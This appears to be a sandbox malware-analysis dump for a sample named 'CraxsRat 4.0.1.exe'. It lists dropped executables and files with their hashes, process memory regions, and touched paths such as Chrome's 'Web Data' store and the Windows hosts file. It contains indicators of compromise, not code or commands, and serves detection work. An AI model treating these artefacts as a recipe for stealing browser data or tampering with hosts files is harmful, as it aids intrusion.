SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

MD5 15b7bffd31462f0ca361a1c2b2211f86
SHA1 bdf831203ded29b82e4aa989f26fea441b6a20ba
SHA256 1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580
SHA512 c48fd5855527f2e2615b3614ad43c025fac85ef1538de2a52a6267e3e61be611b04854bbcad54111c56f3ce661159b94d1639414cb0ce0086f466163ed0d3153

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

MD5 15b7bffd31462f0ca361a1c2b2211f86
SHA1 bdf831203ded29b82e4aa989f26fea441b6a20ba
SHA256 1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580
SHA512 c48fd5855527f2e2615b3614ad43c025fac85ef1538de2a52a6267e3e61be611b04854bbcad54111c56f3ce661159b94d1639414cb0ce0086f466163ed0d3153

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

MD5 15b7bffd31462f0ca361a1c2b2211f86
SHA1 bdf831203ded29b82e4aa989f26fea441b6a20ba
SHA256 1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580
SHA512 c48fd5855527f2e2615b3614ad43c025fac85ef1538de2a52a6267e3e61be611b04854bbcad54111c56f3ce661159b94d1639414cb0ce0086f466163ed0d3153

memory/2704-1524-0x0000000000400000-0x000000000079B000-memory.dmp

memory/952-1526-0x00000000008B0000-0x00000000008C8000-memory.dmp

memory/2372-1527-0x0000000000720000-0x0000000000A90000-memory.dmp

memory/2372-1528-0x0000000005520000-0x00000000055BC000-memory.dmp

memory/2372-1530-0x0000000005B70000-0x0000000006114000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ml042oli.xay.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4960-1536-0x000001C5F02B0000-0x000001C5F02D2000-memory.dmp

memory/4960-1542-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1543-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1544-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

memory/4556-1548-0x0000000000400000-0x0000000000484000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CraxsRat 4.0.1.exe.log

MD5 99e770c0d4043aa84ef3d3cbc7723c25
SHA1 19829c5c413fccba750a3357f938dfa94486acad
SHA256 33c7dd4c852dae6462c701337f8e0a8647602847ccaee656fa6f1149cccfb5d5
SHA512 ba521e2f57d7e1db19445201948caa7af6d953e1c1340228934888f8ec05b8984ad492122d0bf0550b5e679614d8a713ecf68f91916ffa6e5d8f75bf003aae39

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

memory/4556-1552-0x0000000005670000-0x0000000005702000-memory.dmp

memory/4556-1553-0x0000000005520000-0x000000000552A000-memory.dmp

memory/4960-1554-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4556-1555-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4556-1556-0x0000000005770000-0x00000000057C6000-memory.dmp

memory/4556-1559-0x0000000008D10000-0x0000000008D76000-memory.dmp

memory/3688-1562-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3688-1564-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3688-1566-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4556-1567-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4960-1569-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1568-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1570-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1571-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4556-1572-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4084-1573-0x0000000000400000-0x0000000000458000-memory.dmp

memory/4084-1575-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

MD5 3a5ee15f1b5aaf04c8ecc0b5c59bfc8b
SHA1 fdb221c701a53b0dd300d9ec4bd8441a1d685092
SHA256 23cd0bd4b981f00c984888a3e59cdf6379ae973fc7682b54ffca6964b1509756
SHA512 5d1d09ca798c71b0cc84527391c64946408686b21d03543ce15ce185df859af1c3b26c2e2fc3e71de655a6a6ddd1045606792064149f61d67309e0200d5832f3

memory/4556-1586-0x00000000058E0000-0x00000000058F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

memory/4084-1590-0x0000000000460000-0x0000000000529000-memory.dmp

memory/4084-1589-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe

MD5 d1529aa798dfc7fe269926f5594b467b
SHA1 99f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256 958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA512 5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe

MD5 d1529aa798dfc7fe269926f5594b467b
SHA1 99f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256 958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA512 5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe

MD5 d1529aa798dfc7fe269926f5594b467b
SHA1 99f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256 958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA512 5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe

MD5 5f2f1ae240812065799e8c05d3a01aa7
SHA1 e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256 adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512 d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe

MD5 5f2f1ae240812065799e8c05d3a01aa7
SHA1 e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256 adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512 d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f58e73a5c43b0713d39bb6cca4251670
SHA1 ece141754053a0d3855b7270a9569601e99dbbf6
SHA256 f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015
SHA512 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8

memory/748-1632-0x0000023B27920000-0x0000023B27930000-memory.dmp

memory/748-1634-0x0000023B27920000-0x0000023B27930000-memory.dmp

memory/748-1633-0x0000023B27920000-0x0000023B27930000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 23fe306d33dea7acaf8d7adb3ebcf88c
SHA1 048a537ecf8d7949c5112950eccb4ff0941d00f3
SHA256 0fd245bfb504d1d1960d46680cc6aa01597747ff6c9bb37cc2b0101bc36f5f5c
SHA512 f7ce42890a53cfa1266966e97c2f31ab272a23cfec2b5750757887dda38b7ad224c27949f3bc2d6be7d5a6400f4391a908c2e1aea6c8db193f89f7764f87c7b1

memory/392-1639-0x00007FFD80C90000-0x00007FFD80E85000-memory.dmp

memory/392-1640-0x00007FFD80B20000-0x00007FFD80BDE000-memory.dmp

memory/580-1641-0x0000023B06220000-0x0000023B06241000-memory.dmp

memory/580-1642-0x0000023B06250000-0x0000023B06277000-memory.dmp

memory/580-1644-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/656-1645-0x000001F4BC9C0000-0x000001F4BC9E7000-memory.dmp

memory/656-1649-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/2900-1647-0x00007FF74CD50000-0x00007FF74D31C000-memory.dmp

memory/932-1652-0x000001CCEE2D0000-0x000001CCEE2F7000-memory.dmp

memory/1012-1653-0x0000025AABEA0000-0x0000025AABEC7000-memory.dmp

memory/1012-1657-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/848-1661-0x000001361F600000-0x000001361F627000-memory.dmp

memory/932-1655-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/848-1663-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/580-1669-0x0000023B06250000-0x0000023B06277000-memory.dmp

memory/392-1654-0x00007FF60F100000-0x00007FF60F129000-memory.dmp

memory/1764-1675-0x00000195CB0F0000-0x00000195CB100000-memory.dmp

memory/656-1676-0x000001F4BC9C0000-0x000001F4BC9E7000-memory.dmp

memory/932-1677-0x000001CCEE2D0000-0x000001CCEE2F7000-memory.dmp

memory/1012-1680-0x0000025AABEA0000-0x0000025AABEC7000-memory.dmp

memory/1044-1684-0x000001D869690000-0x000001D8696B7000-memory.dmp

memory/1036-1683-0x0000021A0ED00000-0x0000021A0ED27000-memory.dmp

memory/848-1682-0x000001361F600000-0x000001361F627000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c97a801bb5d6c21c265ab7f283ba83e
SHA1 7c0a4cb73d63702a2d454268d983e0dcb36a8bf8
SHA256 69d9676a8c93686c904d9ce6193221476d6c72bc4d3250a232c03ccbeae380c7
SHA512 d3abd8bfccd3a3fec55c13e85e755fbd589e6ea04321169c7c8cf5badf7b6ffe96c0c2ed449a0b4a99ecfd1e7bb7edc3311d335c8956cf344c9584fb0bda50d9

memory/1036-1685-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1044-1687-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1144-1686-0x000001BBF2510000-0x000001BBF2537000-memory.dmp

memory/1144-1690-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1196-1694-0x000001F86A340000-0x000001F86A367000-memory.dmp

memory/1196-1695-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1208-1699-0x0000023351730000-0x0000023351757000-memory.dmp

memory/1208-1701-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1224-1702-0x000001C372180000-0x000001C3721A7000-memory.dmp

memory/1224-1705-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1352-1707-0x000001A81E460000-0x000001A81E487000-memory.dmp

memory/1036-1724-0x0000021A0ED00000-0x0000021A0ED27000-memory.dmp

memory/1144-1730-0x000001BBF2510000-0x000001BBF2537000-memory.dmp

memory/1764-1732-0x00000195CB0F0000-0x00000195CB100000-memory.dmp

memory/1044-1728-0x000001D869690000-0x000001D8696B7000-memory.dmp

memory/1196-1733-0x000001F86A340000-0x000001F86A367000-memory.dmp

memory/1208-1734-0x0000023351730000-0x0000023351757000-memory.dmp

memory/1224-1735-0x000001C372180000-0x000001C3721A7000-memory.dmp

memory/1352-1736-0x000001A81E460000-0x000001A81E487000-memory.dmp

memory/1400-1737-0x00000206BEEA0000-0x00000206BEEC7000-memory.dmp

memory/1408-1739-0x00000257CB070000-0x00000257CB097000-memory.dmp

memory/1492-1741-0x000002B064BB0000-0x000002B064BD7000-memory.dmp

memory/1520-1744-0x00000190793C0000-0x00000190793E7000-memory.dmp

memory/1588-1747-0x000001D0A3D70000-0x000001D0A3D97000-memory.dmp

memory/1620-1751-0x0000025A1FC90000-0x0000025A1FCB7000-memory.dmp

memory/1776-1756-0x000001E0E5CE0000-0x000001E0E5D07000-memory.dmp